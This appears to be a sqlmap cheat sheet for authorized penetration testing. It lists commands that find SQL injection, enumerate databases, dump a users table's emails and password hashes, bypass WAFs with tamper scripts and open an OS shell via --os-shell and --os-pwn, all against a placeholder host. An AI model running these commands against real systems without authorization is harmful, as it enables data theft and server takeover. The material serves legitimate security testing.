sqlmap Cheat Sheet
Automated SQL injection detection and exploitation for web parameters, headers, and cookies.
Overview
sqlmap automates finding and exploiting SQL injection in HTTP parameters, cookies, headers, and POST bodies. Use after Burp/ZAP or manual testing shows suspicious behavior, or to confirm/time-box injection on authorized targets.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Install
sudo apt update && sudo apt install -y sqlmapor
pip install sqlmapgit clone --depth 1 https://github.com/sqlmapproject/sqlmap.gitEssential commands
Single URL parameter
sqlmap -u "https://target.example/item?id=1" --batchPOST body from Burp request file
sqlmap -r request.txt --batchCookie-authenticated session
sqlmap -u "https://target.example/dashboard" --cookie="PHPSESSID=abc123" --batchEnumerate DBMS and current user
sqlmap -u "https://target.example/item?id=1" --current-user --current-db --batchQuick one-liners
Test a URL parameter for SQL injection
sqlmap -u "https://target.example/item?id=1" --batchRun sqlmap from a Burp saved request
sqlmap -r request.txt --batchList databases after injection is found
sqlmap -u "https://target.example/item?id=1" --dbs --batchGet current DB user and database name
sqlmap -u "https://target.example/item?id=1" --current-user --current-db --batchRoute traffic through Burp proxy
sqlmap -r request.txt --proxy=http://127.0.0.1:8080 --batchCommon workflows
Confirm injection and enumerate databases —
sqlmap -u "https://target.example/search?q=test" --batch --level=3 --risk=2sqlmap -u "https://target.example/search?q=test" --dbs --batchsqlmap -u "https://target.example/search?q=test" -D appdb --tables --batchsqlmap -u "https://target.example/search?q=test" -D appdb -T users --columns --batchsqlmap -u "https://target.example/search?q=test" -D appdb -T users -C email,password_hash --dump --batchSave raw HTTP request to request.txt (right-click in Burp → Copy to file)
sqlmap -r request.txt -p id --batch --level=3sqlmap -r request.txt --dbs --batchWAF bypass and tamper scripts —
sqlmap -u "https://target.example/item?id=1" --tamper=space2comment,between --random-agent --batchsqlmap -r request.txt --proxy=http://127.0.0.1:8080 --batchOS shell (only when in scope and MSSQL/MySQL with stacked queries) —
sqlmap -u "https://target.example/item?id=1" --os-shell --batchsqlmap -u "https://target.example/item?id=1" --os-pwn --batchFlags reference
-u URL | Target URL |
|---|---|
-r FILE | Load HTTP request from file |
-p PARAM | Test specific parameter(s) |
--data | POST data string |
--cookie | Cookie header value |
--header | Extra HTTP header |
--level=1-5 | Test depth (default 1) |
--risk=1-3 | Payload risk (default 1) |
--batch | Non-interactive defaults |
--dbs | List databases |
-D DB | Database name |
--tables | List tables |
-T TABLE | Table name |
--columns | List columns |
-C COL | Column name(s) |
--dump | Dump table data |
--tamper=SCRIPT | Payload tamper script(s) |
--proxy | HTTP/S proxy (e.g. Burp) |
--random-agent | Random User-Agent |
--threads=N | Concurrent HTTP requests |
--os-shell | Interactive OS shell |
--technique=BEUSTQ | Injection techniques to use |
Tips
- Start with --batch --level=1 --risk=1; increase level/risk only when needed to reduce noise and false positives.
- Always test through Burp (--proxy=http://127.0.0.1:8080) to verify requests and stay in scope.
- Use -r request.txt for authenticated or complex multi-parameter requests.
- --dump can be large and sensitive; restrict to agreed tables/columns with -C.